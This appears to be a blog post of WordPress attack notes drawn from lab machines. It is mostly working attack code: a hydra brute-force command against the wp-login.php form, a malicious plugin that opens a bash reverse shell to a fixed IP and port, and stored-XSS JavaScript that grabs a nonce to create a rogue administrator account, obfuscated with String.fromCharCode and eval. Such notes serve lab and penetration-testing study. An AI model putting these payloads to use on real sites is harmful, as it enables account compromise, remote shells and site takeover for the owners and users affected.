Enumeration
wpscan --url $target
Maybe an API token could be useful — then, the WordPress Vulnerability Database is used.
Login brute force
hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Check users:
http://spectra.htb/main/?author=1
http://spectra.htb/main/?author=2
…
Most beautiful wordpress plugin
<?php
/*
Plugin Name: Super plugin
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.178.65/4444 0>&1'");
?>
XSS injection
If there is a way to inject code somewhere (e.g. via a plugin) which could also be viewed/executed by an admin, we could try to create an own admin account via a stored XSS injection.
Prepare the javascript code:
var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php";
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=attacker@attacker.local&pass1=password&pass2= password&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);
Minimize the code (e.g. via jscompress.com). Then, encode it, e.g. with the following function:
function encode_to_javascript(string) {
var input = string
var output = '';
for(pos = 0; pos < input.length; pos++) {
output += input.charCodeAt(pos);
if(pos != (input.length - 1)) {
output += ",";
}
}
return output;
}
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)
Inject the script now:
<script>eval(String.fromCharCode(…))</script>
… and wait for the code to be executed.
Leave a Reply
You must be logged in to post a comment.